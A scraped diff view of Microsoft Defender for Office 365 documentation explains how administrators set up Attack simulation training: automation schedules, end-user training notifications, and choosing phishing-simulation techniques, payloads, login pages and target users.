- - **Name**<sup>\*</sup>
- - **Language**<sup>\*</sup>: If the landing page contains multiple translations, the first two languages are shown directly. To see the remaining languages, hover over the numeric icon (for example, **+10**).
- - **Source**
- - **Default language**<sup>\*</sup>
- - **Status**<sup>\*</sup>
- - **Linked simulations**<sup>\*</sup>
- - **Created by**
- - **Created time**<sup>\*</sup>
- - **Modified by**<sup>\*</sup>
- - **Last modified**<sup>\*</sup>
-
- To find a landing page in the list, type part of the landing page name in the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and then press the ENTER key.
-
- Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to filter the landing pages by language.
-
- When a landing page is selected, if you click anywhere in the row, a details flyout opens that shows more information about the landing page:
-
- - The **Preview** tab shows what the landing page looks like to users.
- - The **Details** tab shows the properties of the landing page.
-
- > [!TIP]
- > To see details about other landing pages without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
- When you're finished in the landing page details flyout, select **Close**.
-
- On the **Selecting phish landing page** page, select a landing page to use by selecting the check box next to the **Name** column.
--- **Use a custom URL**: This setting isn't available if you selected **Malware Attachment** or **Link to Malware** on the [Select social engineering techniques](#select-one-or-more-social-engineering-techniques) page.-
- If you select **Use a custom URL**, you need to add the URL in the **Enter the custom landing page URL** box that appears. No other options are available on the **Selecting phish landing page** page.
-
-When you're finished on the **Selecting phish landing page** page, select **Next**.
-
-## Select end user notifications
-
-On the **Select end user notification** page, select from the following notification options:
--- **Do not deliver notifications**: No other configuration options are available on the page. Users don't receive **Training assignment notifications**, **Training reminder notifications** or **Positive reinforcement notifications** from the simulation. Select **Proceed** in the warning dialog.--- **Microsoft default notification (recommended)**: The notifications that users receive are shown on the page:
- - **Microsoft default positive reinforcement notification**
- - **Microsoft default training assignment notification**
- - **Microsoft default training reminder notification**
-
- Select the default language to use in **Select default language**. The available values are: **Chinese (Simplified)**, **Chinese (Traditional, Taiwan)**, **English**, **French**, **German**, **Italian**, **Japanese**, **Korean**, **Portuguese**, **Russian**, **Spanish**, **Dutch**, **Polish**, **Arabic**, **Finnish**, **Greek**, **Hungarian**, **Indonesian**, **Norwegian Bokmål**, **Romanian**, **Slovak**, **Swedish**, **Thai**, **Turkish**, **Vietnamese**, **Catalan**, **Croatian**, or **Slovenian**.
-
- For each notification, the following information is available:
-
- - **Notifications**: The name of the notification.
- - **Language**: If the notification contains multiple translations, the first two languages are shown directly. To see the remaining languages, hover over the numeric icon (for example, **+10**).
- - **Type**: One of the following values:
- - **Positive reinforcement notification**
- - **Training assignment notification**
- - **Training reminder notification**
- - **Delivery preferences**: You need to configure the following delivery preferences before you can continue:
- - For **Microsoft default positive reinforcement notification**, select **Do not deliver**, **Deliver after campaign ends**, or **Deliver during campaign**.
- - For **Microsoft default training reminder notification**, select **Twice a week** or **Weekly**.
- - **Actions**: If you select :::image type="icon" source="../../media/m365-cc-sc-view-icon.png" border="false"::: **View**, a **Review notification** page opens with the following information:
- - **Preview** tab: View the notification message as users see it.
- - To view the message in different languages, use the **Select language** box.
- - Use the **Select payload to preview** box to select the notification message for simulations that contain multiple payloads.
- - **Details** tab: View details about the notification:
- - **Notification description**
- - **Source**: For built-in notifications, the value is **Global**. For custom notifications, the value is **Tenant**.
- - **Notification type**: One of the following types based on the notification you originally selected:
- - **Positive reinforcement notification**
- - **Training assignment notification**
- - **Training reminder notification**
- - **Modified by**
- - **Last modified**
-
- When you're finished on the **Review notification** page, select **Close** to return to the **Select end user notification** page.
--- **Customized end user notifications**: No other configuration options are available on the page. When you select **Next**, you need to select a **Training assignment notification**, a **Training reminder notification**, and (optionally) a **Positive reinforcement notification** to use for the simulation as described in the next three subsections.-
-When you're finished on the **Select end user notification** page, select **Next**.
-
-### Select a training assignment notification
-
-> [!NOTE]
-> This page is available only if you selected **Customized end user notifications** on the [Select end user notifications](#select-end-user-notifications) page.
-
-The **Training assignment notification** page shows the following notifications and their configured languages:
--- **Microsoft default training assignment notification**-- **Microsoft default training only campaign-training assignment notification**-- Any custom training assignment notifications that you previously created.-
-These notifications are also available at **Attack simulation training** \> **Content library** tab \> **End user notifications**:
--- Built-in training assignment notifications are available on the **Global notifications** tab at <https://security.microsoft.com/attacksimulator?viewid=contentlibrary&source=global>.-- Custom training assignment notifications are available on the **Tenant notifications** tab at <https://security.microsoft.com/attacksimulator?viewid=contentlibrary&source=tenant>.-
-For more information, see [End-user notifications for Attack simulation training](attack-simulation-training-end-user-notifications.md).
-
-Do one of the following steps:
--- Select an existing notification to use:
- - To search for an existing notification in the list, type part of the notification name in the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and then press the ENTER key.
- - When you select a notification by clicking anywhere in the row other than the check box, a details flyout opens that shows more information about the notification:
- - The **Preview** tab shows what the notification looks like to users.
- - The **Details** tab shows the properties of the notification.
-
- When you're finished in the notification details flyout, select **Close**.
-
- On the **Training assignment notification** page, select a notification to use by selecting the check box next to the name.
--- Create a new notification to use: Select :::image type="icon" source="../../medi#create-end-user-notifications).-
- > [!NOTE]
- > On the **Define details** page of the new notification wizard, be sure to select the value **Training assignment notification** for the notification type.
-
- When you're finished creating the notification, you return to the **Training assignment notification** page where the new notification now appears in the list for you to select
-
-When you're finished on the **Training assignment notification** page, select **Next**.
-
-### Select a training reminder notification
-
-> [!NOTE]
-> This page is available only if you selected **Customized end user notifications** on the [Select end user notifications](#select-end-user-notifications) page.
-
-The **Training reminder notification** page shows the following notifications and their configured languages:
--- **Microsoft default training reminder notification**-- **Microsoft default training only campaign-training reminder notification**-- Any custom training reminder notifications that you previously created.-
-These notifications are also available at **Attack simulation training** \> **Content library** tab \> **End user notifications**:
--- Built-in training reminder notifications are available on the **Global notifications** tab at <https://security.microsoft.com/attacksimulator?viewid=contentlibrary&source=global>.-- Custom training reminder notifications are available on the **Tenant notifications** tab at <https://security.microsoft.com/attacksimulator?viewid=contentlibrary&source=tenant>.-
-For more information, see [End-user notifications for Attack simulation training](attack-simulation-training-end-user-notifications.md).
-
-In **Set frequency for reminder notification**, select **Weekly** (the default value) or **Twice a week**, and then do one of the following steps:
--- Select an existing notification to use:
- - To search for an existing notification in the list, type part of the notification name in the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and then press the ENTER key.
- - When you select a notification by clicking anywhere in the row other than the check box, a details flyout opens that shows more information about the notification:
- - The **Preview** tab shows what the notification looks like to users.
- - The **Details** tab shows the properties of the notification.
-
- When you're finished in the notification details flyout, select **Close**.
-
- On the **Training reminder notification** page, select a notification to use by selecting the check box next to the name.
--- **Create a new notification to use**: Select :::image type="icon" source="../../medi#create-end-user-notifications).-
- > [!NOTE]
- > On the **Define details** page of the new notification wizard, be sure to select the value **Training reminder notification** for the notification type.
-
- When you're finished creating the notification, you return to the **Training reminder notification** page where the new notification now appears in the list for you to select.
-
-When you're finished on the **Training reminder notification** page, select **Next**.
-
-### Select a positive reinforcement notification
-
-> [!NOTE]
-> This page is available only if you selected **Customized end user notifications** on the [Select end user notifications](#select-end-user-notifications) page.
-
-You have the following options in the **Delivery preferences** section for positive reinforcement notifications:
--- Don't use positive reinforcement notifications: Select **Do not deliver**. There's nothing else to configure on the page, so you go to the [simulation schedule](#simulation-schedule) page when you select **Next**.--- Use an existing positive reinforcement notification: Select one of the remaining values:
- - **Deliver after the user reports a phish and campaign ends**
- - **Deliver immediately after the user reports a phish**.
-
- The following notifications and their configured languages appear on the page:
-
- - **Microsoft default positive reinforcement notification**
- - Any custom positive reinforcement notifications that you previously created.
-
- These notifications are also available at **Attack simulation training** \> **Content library** tab \> **End user notifications**:
-
- - Built-in positive reinforcement notifications are available on the **Global notifications** tab at <https://security.microsoft.com/attacksimulator?viewid=contentlibrary&source=global>.
- - Custom positive reinforcement notifications are available on the **Tenant notifications** tab at <https://security.microsoft.com/attacksimulator?viewid=contentlibrary&source=tenant>.
-
- For more information, see [End-user notifications for Attack simulation training](attack-simulation-training-end-user-notifications.md).
-
- To search for an existing notification in the list, type part of the notification name in the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and then press the ENTER key.
-
- When you select a notification by clicking anywhere in the row other than the check box, a details flyout opens that shows more information about the notification:
-
- - The **Preview** tab shows what the notification looks like to users.
- - The **Details** tab shows the properties of the notification.
-
- When you're finished in the notification details flyout, select **Close**.
-
- On the **Positive reinforcement notification** page, select an existing notification to use by selecting the check box next to the name.
--- Create a new positive reinforcement notification to use: Select :::image type="icon" source="../../medi#create-end-user-notifications).-
- > [!NOTE]
- > On the **Define details** page of the new notification wizard, be sure to select the value **Positive reinforcement notification** for the notification type.
-
- When you're finished creating the notification, you return to the **Positive reinforcement notification** page where the new notification now appears in the list for you to select.
-
-When you're finished on the **Positive reinforcement notification** page, select **Next**.
-
-## Simulation schedule
-
-On the **Simulation schedule** page, select one of the following values:
--- **Randomized**: You still need to select the schedule on the next page, but the simulations will launch at random times within the schedule.-- **Fixed**-
-When you're finished, select **Next**.
-
-## Schedule details
-
-What you see on the **Schedule details** page depends on whether you selected **Randomized** or **Fixed** for the simulation schedule on the previous page.
--- **Randomized** simulation schedule: The following settings are available:
- - **Automation start** section: Use **Select the date you want the automation to start from** to select the start date for the simulations.
-
- - **Automation scoping** section: Configure the following settings:
- - **Select the days of the week that simulations are allowed to start on**: Select one or more days of the week.
- - **Enter the maximum number of simulations that can be started between the start and end dates**: Enter a value from 1 to 10.
- - **Randomize the time of day that simulation emails can be sent for delivery**: Select **Randomize send times** to randomize the send times.
-
- - **Automation end** section: Use **Select the date you want the automations to end** to select the end date for the simulations.
--- **Fixed** simulation schedule: The following settings are available:
- - **Automation start** section: Use **Select the date you want the simulations to start from** to select the start date for the simulations.
-
- - **Automation recurrence** section: Configure the following settings:
- - **Select if you want simulations to launch weekly or monthly**: Select **Weekly** (default) or **Monthly**.
- - **Enter interval you want between automation runs**: Enter a value from 1 to 99 weeks.
- - **Select the day of the week you want the simulations to start from**: Select the day of the week that simulations start.
-
- - **Automation end** section: Selection one of the following values:
- - Use **Select the date you want the automation to end** to select the end date for the simulations.
- - Use **Enter the number of occurrences of the simulations to run before ending** to enter a value from 1 to 10.
-
-When you're finished on the **Schedule details** page, select **Next**.
-
-## Launch details
-
-On the **Launch details** page, configure the following additional settings for the automation:
--- **Use unique payloads across simulations within an automation** section: By default, **Unique payloads** isn't selected.--- **Target all selected users in every simulation run** section: By default, **Target all selected users in every simulation run** isn't selected.--- **Target repeat offenders** section: By default, **Target repeat offenders**is not selected. If you select it, use **Enter the maximum number of times a user can be targeted within this automation** that appears to enter a value from 1 to 10.--- **Send simulation email based upon the user's current time zone setting from Outlook web app** section: By default, **Enable region aware delivery** isn't selected.-
-When you're finished on the **Launch details** page, select **Next**.
-
-## Review simulation automation
-
-On the **Review simulation automation** page, you can review the details of your simulation automation.
-
-You can select **Edit** in each section to modify the settings within the section. Or you can select **Back** or the specific page in the wizard.
-
-When you're finished on the **Review simulation automation**, select **Submit**.
-
-When the simulation automation is created, the page title changes to **New automation created**, where you can use the links to turn on the automation or view all simulation automations.
-
-When you're finished on the **New automation created** page, select **Done**.
-
-Back on the **Simulation automations** page on the **Automations** tab, the simulation automation that you created is now listed with the **Status** value **Inactive**.
-
-To turn on the simulation automation, see the next section.
-
-## Turn on or turn off a simulation automation
--- You can turn on simulations automations with the **Status** value **Inactive**.-- You can turn off simulation automations with the **Status** value **Active**.-- You can't turn on or turn off incomplete simulation automations with the **Status** value **Draft**.-
-To turn on an **Inactive** simulation automation, select it from the list by clicking the check box next to the name. Select the :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn on** action that appears, and then select **Confirm** in the dialog. The **Status** value changes to **Active**.
-
-To turn off an **Active** simulation automation, select it from the list by clicking the check box next to the name. Select the :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn off** action that appears, and then select **Confirm** in the dialog. The **Status** value changes to **Inactive**.
-
-## Remove simulation automations
-
-To remove a simulation automation, select the simulation automation from the list by clicking the check box next to the name. Select the :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete** action that appears, and then select **Confirm** in the dialog.
-
-## View simulation automation details
-
-For simulation automations with the **Status** value **Active** or **Inactive**, select the simulation from the **Simulation automations** page by clicking anywhere in the row other than the check box next to the name. The details flyout that opens contains the following information:
--- The simulation automation name and the number of items collected.-- **General** tab:
- - **Type**: The value is **Simulation**.
- - **Name**
- - **Description**
- - **Run conditions** sections: Select **Edit** to open the simulation automation wizard on the related page.
-- **Run history** tab: This tab is available only for simulation automations with the **Status** value **Active** or **Inactive**.-
- Shows information about the run history of the simulation.
-
-> [!TIP]
-> To see details about other simulation automations without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-## Frequently asked questions (FAQ) for simulations automations
-
-This section contains some of the most common questions about Simulation automations.
-
-### Why does the Status value under Automations show Completed, but the Status value under Simulations show In progress?
-
-**Completed** on the **Simulation automations** page means the job of simulation automation is complete, and no more simulations are created by it. Simulation is a separate entity that will complete after 30 days of simulation launch time.
-
-### Why is the simulation end date 30 days after creation, even though I selected an automation end date of one week?
-
-A one week end date for the simulation automation means no new simulations are created by it after one week. For simulations created by a simulation automation, the default end date is 30 days after the creation of the simulation.
-
-### If we have multiple social engineering techniques and related payloads (for example, Credential harvest, Link to Malware, and Drive by URL) that target 300 users, how are the payloads sent to users? Do all payload types go to all users, or is the selection random?
-
-If you don't select **Target all selected users in every simulation run** on the [Launch details](#launch-details) page, all targeted users are distributed over the maximum number of simulations that are created by the simulation automation.
-
-If you select **Target all selected users in every simulation run** on the [Launch details](#launch-details) page, all targeted users are part of every simulation that's created by the simulation automation.
-
-### How does the Randomize option on the Simulation schedule page work?
-
-The **Randomize** option on the [Simulation schedule](#simulation-schedule) page optimally selects a day within the start date and end date range to launch simulations.
-
-### How does the Randomize option on the Select a payload and login page work?
-
-The **Randomize** option on the [Select payloads and login pages](#select-payloads-and-login-pages) page works as follows:
-
-For every run, a social engineering technique from the list of selected techniques is chosen, and then a random payload for that technique will be chosen from both **Global payloads** (built-in) and **Tenant payloads** (custom). This behavior helps to ensure that the selected payload wasn't part of any previous run for this particular automation.
-
-### With a randomized schedule, the maximum number of simulations is between 1 and 10. How does this work?
-
-This number is the maximum number of runs that can be created by this automation. For example, if you select 10, the maximum number of simulations that will be created by this automation is 10. The number of simulations can be fewer depending on the number of targeted users and the availability of payloads.
-
-### If I select only one specific day between two days (for example, Wednesday), how many simulations will I see on the Simulation tab?
-
-If there's only one Wednesday between the start date and end date, the automation has only one valid day to send out the simulation. Even if you selected a higher value for **Max number of simulations**, this value gets overwritten to one.
-
-### How does randomize send times currently work?
-
-Randomize send time works in batches of 1,000 users and is meant to be used with a large number of targeted users. If less than 1,000 users are involved in simulations created by automations, batches of 100 users are created for randomized send times.
-
-## Related links
-
-[Get started using Attack simulation training](attack-simulation-training-get-started.md)
-
-[Simulation automations for Attack simulation training](attack-simulation-training-simulation-automations.md)
-
-[Gain insights through Attack simulation training](attack-simulation-training-insights.md)
security Attack Simulation Training Simulations https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/attack-simulation-training-simulations.md
- Title: Simulate a phishing attack with Attack simulation training------
- - m365-security
- - tier2
-
-description: Admins can learn how to simulate phishing attacks and train their users on phishing prevention using Attack simulation training in Microsoft Defender for Office 365 Plan 2.
Previously updated : 3/15/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
--
-# Simulate a phishing attack with Attack simulation training
--
-In Attack simulation training in Microsoft 365 E5 or Microsoft Defender for Office 365 Plan 2, simulations are benign cyberattacks that you run in your organization. These simulations test your security policies and practices, as well as train your employees to increase their awareness and decrease their susceptibility to attacks. This article walks you through creating a simulated phishing attack using Attack simulation training.
-
-For getting started information about Attack simulation training, see [Get started using Attack simulation training](attack-simulation-training-get-started.md).
-
-To launch a simulated phishing attack, do the following steps:
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Attack simulation training** \> **Simulations** tab. Or, to go directly to the **Simulations** tab, use <https://security.microsoft.com/attacksimulator?viewid=simulations>.
-
-2. On the **Simulations** tab, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Launch a simulation** to start the new simulation wizard.
-
- :::image type="content" source="../../media/attack-sim-training-simulations-launch.png" alt-text="The Launch a simulation button on the Simulations tab in Attack simulation training in the Microsoft Defender portal" lightbox="../../media/attack-sim-training-simulations-launch.png":::
-
- The following sections describe the steps and configuration options to create a simulation.
-
- > [!NOTE]
- > At any point after you name the simulation during the new simulation wizard, you can select **Save and close** to save your progress and continue later. The incomplete simulation has the **Status** value **Draft**. You can pick up where you left off by selecting the simulation and then selecting the :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit simulation** action that appears.
-
-## Select a social engineering technique
-
-On the **Select technique** page, select an available social engineering technique:
--- **Credential Harvest**-- **Malware Attachment**-- **Link in Attachment**-- **Link to Malware**-- **Drive-by URL**-- **OAuth Consent Grant**-- **How-to Guide**-
-If you select the **View details** link in the description, a details flyout opens that describes the technique and the simulation steps that result from the technique.
-
-For more information about the different social engineering techniques, see [Simulations](attack-simulation-training-get-started.md#simulations).
--
-When you're finished on the **Select technique** page, select **Next**.
-
-## Name and describe the simulation
-
-On the **Name simulation** page, configure the following settings:
--- **Name**: Enter a unique, descriptive name for the simulation.-- **Description**: Enter an optional detailed description for the simulation.-
-When you're finished on the **Name simulation** page, select **Next**.
-
-## Select a payload and login page
-
-On the **Select payload and login page** page, you need to select an existing payload or create a new payload to use.
-
-For the **Credential Harvest** or **Link in Attachment** social engineering techniques, you can also view the login page that's used in the payload, select a different login page to use, or create a new login page to use.
-
-### Select a payload
-
-The **Select payload and login page** page has two tabs:
--- **Global payloads**: Contains built-in payloads.-- **Tenant payloads**: Contains custom payloads.-
-The following information is shown for each payload:
--- **Payload name**-- **Language**: The language of the payload content. Microsoft's payload catalog (global) provides payloads in 29+ languages as described in :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter**.-- **Predicted compromise rate**: Historical data across Microsoft 365 that predicts the percentage of people who should be compromised by this payload (users compromised / total number of users who receive the payload). For more information, see [Predicted compromise rate](attack-simulation-training-get-started.md#predicted-compromise-rate).-
-You can sort the entries by clicking on an available column header.
-
-To find a payload in the list, type part of the payload name in the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and then press the ENTER key.
-
-To filter the payloads, select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter**. The following filters are available in the **Filters** flyout that opens:
--- **Source**: The available values are: **Global**, **Tenant**, and **All**.--- **Complexity**: Calculated based on the number of indicators in the payload that indicate a possible attack (spelling errors, urgency, etc.). More indicators are easier to identify as an attack and indicate lower complexity. The available values are: **High**, **Medium**, and **Low**.--- **Language**: The available values are: **English**, **Spanish**, **German**, **Japanese**, **French**, **Portuguese**, **Dutch**, **Italian**, **Swedish**, **Chinese (Simplified)**, **Chinese (Traditional, Taiwan)**, **Norwegian Bokmål**, **Polish**, **Russian**, **Finnish**, **Korean**, **Turkish**, **Hungarian**, **Hebrew**, **Thai**, **Arabic**, **Vietnamese**, **Slovak**, **Indonesian**, **Romanian**, **Slovenian**, **Croatian**, **Catalan**, and **Other**.--- **Filter by theme**: The available values are: **Account Activation**, **Account Verification**, **Billing**, **Clean up Mail**, **Document Received**, **Expense**, **Fax**, **Finance Report**, **Incoming Messages**, **Invoice**, **Item Received**, **Login Alert**, **Mail Received**, **Password**, **Payment**, **Payroll**, **Personalized Offer**, **Quarantine**, **Remote Work**, **Review Message**, **Security Update**, **Service Suspended**, **Signature Required**, **Upgrade Mailbox Storage**, **Verify mailbox**, **Voicemail**, and **Other**.--- **Filter by brand**: The available values are: **American Express**, **Capital One**, **DHL**, **DocuSign**, **Dropbox**, **Facebook**, **First American**, **Microsoft**, **Netflix**, **Scotiabank**, **SendGrid**, **Stewart Title**, **Tesco**, **Wells Fargo**, **Syrinx Cloud**, and **Other**.--- **Filter by industry**: The available values are: **Banking**, **Business Services**, **Consumer Services**, **Education**, **Energy**, **Construction**, **Consulting**, **Financial Services**, **Government**, **Hospitality**, **Insurance**, **Legal**, **Courier Services**, **Healthcare**, **Manufacturing**, **Retail**, **Telecom**, **Real Estate**, and **Other**.--- **Current event**: The available values are **Yes** or **No**.--- **Controversial**: The available values are **Yes** or **No**.-
-When you're finished configuring filters, select **Apply**, **Cancel**, or :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-If you select a payload by selecting the check box next to the name, a :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Send a test** action appears above the list of payloads. Use this action to send a copy of the payload email to yourself (the currently logged in user) for inspection.
--
-On the **Tenant payloads** tab, if no payloads are available or if you want to create your own payload, select :::image type="icon" source="../../medi#create-payloads).
--
-If you select a payload by clicking anywhere in the row other than the check box next to the name, details about the payload are shown in a flyout that opens:
--- The **Overview** tab (named **Payload** in **Credential Harvest** and **Link in Attachment** payloads) contains details about the payload, including a preview.-- The **Login page** tab is available only for **Credential Harvest** or **Link in Attachment** payloads and is described in the [Select a login page](#select-a-login-page) subsection.-- The **Attachment** tab is available only for **Malware Attachment**, **Link in Attachment**, and **Oauth Consent Grant** payloads. This tab contains details about the attachment, including a preview.-- The **Simulations launched** tab contains the **Simulation name**, **Click rate**, **Compromised rate**, and **Action**.--
-If the simulation doesn't use **Credential Harvest** or **Link in Attachment** payloads, or if you don't want to view or edit the login page that's used, select **Next** on the **Select payload and login page** page to continue.
-
-To select the login page that's used in **Credential Harvest** or **Link in Attachment** payloads, go to the [Select a login page](#select-a-login-page) subsection.
-
-### Select a login page
-
-> [!NOTE]
-> The **Login page** tab is available only in the details flyout of **Credential Harvest** or **Link in Attachment** payloads.
-
-On the **Select payload and login page** page, select the payload by clicking anywhere in the row other than the check box to open the details flyout for the payload.
-
-In the details flyout of the payload, the **Login page** tab shows the login page that's currently selected for the payload.
-
-To view the complete login page, use the **Page 1** and **Page 2** links at the bottom of the page for two-page login pages.
--
-To change the login page that's used in the payload, select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Change login page**.
-
-On the **Select login page** flyout that opens, the following information is shown for each login page:
--- **Name**-- **Language**-- **Source**: For built-in login pages, the value is **Global**. For custom login pages, the value is **Tenant**.-- **Created by**: For built-in login pages, the value is **Microsoft**. For custom login pages, the value is the UPN of the user who created the login page.-- **Last modified**-- **Actions**: Select :::image type="icon" source="../../media/m365-cc-sc-eye-icon.png" border="false"::: **Preview** to preview the login page.-
-To find a login page in the list, type part of the login page name in the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and then press the ENTER key.
-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to filter the login pages by **Source** or **Language**.
--
-To create a new login page, select :::image type="icon" source="../../medi#create-login-pages).
-
-Back on the **Select login page**, verify the new login page you created is selected, and then select **Save**.
-
-Back on the payload details flyout, select :::image type="icon" source="../../media/m365-cc-sc-close-icon.png" border="false"::: **Close**.
-
-When you're finished on the **Select a payload and login page** page, select **Next**.
-
-### Configure OAuth Payload
-
-> [!NOTE]
-> This page is available only if you selected **OAuth Consent Grant** on the [Select technique](#select-a-social-engineering-technique) page and a corresponding payload.
-
-On the **Configure OAuth payload** page, configure the following settings:
--- **App name**: Enter a name for the payload.-- **App logo**: Select **Browse** to select a .png, .jpeg, or .gif file to use. To remove a file after you've selected it, select **Remove**.-- **Select app scope**: Choose one of the following values:
- - **Read user calendars**
- - **Read user contacts**
- - **Read user mail**
- - **Read all chat messages**
- - **Read all files that user can access**
- - **Read and write access to user mail**
- - **Send mail as a user**
-
-When you're finished on the **Configure OAuth payload** page, select **Next**.
-
-## Target users
-
-On the **Target users** page, select who receives the simulation. Use the following options to select users:
--- **Include all users in your organization**: The unmodifiable list of users is show in groups of 10. You can use **Next** and **Previous** below the list of users to scroll through the list. You can also use :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** on the page to find specific users.-
- > [!TIP]
- > Although you can't remove users from the list on this page, you can use the next **Exclude users** page to exclude specific users.
--- **Include only specific users and groups**: At first, no users or groups are shown on the **Targeted users** page. To add users or groups to the simulation, choose one of the following options:-
- - :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add users**: In the **Add users** flyout that opens, you find and select users and groups to receive the simulation. **Dynamic distribution groups are not supported**. The following search tools are available:
-
- - **Search for users or groups**: If you click in the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and do one of the following actions, the **Filter users by categories** options on the **Add users** flyout are replaced by a **User list** section:
-
- - Type three or more characters and then press the ENTER key. Any users or group names that contain those characters are shown in the **User list** section by **Name**, **Email**, **Job title**, and **Type**.
- - Type less than three characters or no characters and then press the ENTER key. No users are shown in the **User list** section, but you can type three or more characters in the **Search** box to search for users and groups.
-
- The number of results appears in the **Selected (0/x) users** label.
-
- > [!TIP]
- > Selecting **Add filters** clears and replaces any results the **User list** section with **Filter users by categories**.
-
- When you have a list of users or groups in the **User list** section, select some or all of the results by selecting the check box next to the **Name** column. The number of selected results appears in the **Selected (y/x) users** label.
-
- Select **Add x users** to add the selected users or groups on the **Target users** page and to return to the **Target users** page.
-
- - **Filter users by categories**: Use the following options:
-
- - **Suggested user groups**: Select from the following values:
- - **All suggested user groups**: The same result as selecting **Users not targeted by a simulation in the last three months** and **Repeat offenders**.
- - **Users not targeted by a simulation in the last three months**
- - **Repeat offenders**: For more information, see [Configure the repeat offender threshold](attack-simulation-training-settings.md#configure-the-repeat-offender-threshold).
-
- - **User tags**: User tags are identifiers for specific groups of users (for example, Priority accounts). For more information, see [User tags in Microsoft Defender for Office 365](user-tags-about.md). Use the following options:
- - **Search**: In :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search by user tags**, you can type part of the user tag name and then press Enter. You can select some or all of the results.
- - Select **All user tags**
- - Select existing user tags. If the link is available, select **See all user tags** to see the complete list of available tags.
-
- - **City**: Use the following options:
- - **Search**: In :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search by City**, you can type part of the City value and then press Enter. You can select some or all of the results.
- - Select **All City**
- - Select existing City values. If the link is available, select **See all Cities** to see the complete list of available City values.
-
- - **Country**: Use the following options:
- - **Search**: In :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search by Country**, you can type part of the Country/region value and then press Enter. You can select some or all of the results.
- - Select **All Country**
- - Select existing City values. If the link is available, select **See all Countries** to see the complete list of available Country/region values.
-
- - **Department**: Use the following options:
- - **Search**: In :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search by Department**, you can type part the Department value and then press Enter. You can select some or all of the results.
- - Select **All Department**
- - Select existing Department values. If the link is available, select **See all Departments** to see the complete list of available Department values.
-
- - **Title**: Use the following options:
- - **Search**: In :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search by Title**, you can type part of the Title value and then press Enter. You can select some or all of the results.
- - Select **All Title**
- - Select existing Title values. If the link is available, select **See all Titles** to see the complete list of available Title values.
-
- :::image type="content" source="../../media/attack-sim-training-simulations-target-users-filter-by-category.png" alt-text="The User filtering on the Target users page in Attack simulation training in the Microsoft Defender portal" lightbox="../../media/attack-sim-training-simulations-target-users-filter-by-category.png":::
-
- You can use some or all of the search categories to find users and groups. If you select multiple categories, the AND operator is used. Any users or groups must match both values to be returned in the results (which is virtually impossible if you use the value **All** in multiple categories).
-
- The number of values that were used as the search criteria by a specific category is shown next to the category tile (for example, **City 50** or **Priority accounts 10**).
-
- When you're finished searching by category, select the **Apply(x)** button. The previous **Filter users by categories** options on the **Add users** flyout are replaced by the following information:
-
- - **Filters** section: Show how many filter values you used and the names of the filter values. If it's available, select the **See all** link to see all filter values
- - **User list** section: Shows the users or groups that match your category searches. The number of results appears in the **Selected (0/x) users** label.
-
- When you have a list of users or groups in the **User list** section, select some or all of the results by selecting the check box next to the **Name** column. The number of selected results appears in the **Selected (y/x) users** label.
-
- Select the **Add x users** button to add the selected users or groups on the **Target users** page and to return to the **Target users** page.
-
- - :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Import**: In the dialog that opens, specify a CSV file that contains one email address per line.
-
- After you find a select the CSV file, the users are imported and shown on the **Targeted users** page.
-
- On the main **Target users** page, you can use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to find selected users. You can also select :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Delete** and then **Confirm** in the confirmation dialog to remove specific users.
-
- To add more users and groups, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add users** or :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Import** on the **Target users** page and repeat the previous steps.
-
-When you're finished on the **Target users** page, select **Next**.
-
-## Exclude users
-
-On the **Exclude users** page, you can select **Exclude some of the targeted users from this simulation** to exclude users that would otherwise be included based on your previous selections on the **Target users** page.
-
-The methods to find and select users are the same as described in the previous section for **Include only specific users and groups**.
-
-When you're finished on the **Exclude users** page, select **Next**.
-
-> [!TIP]
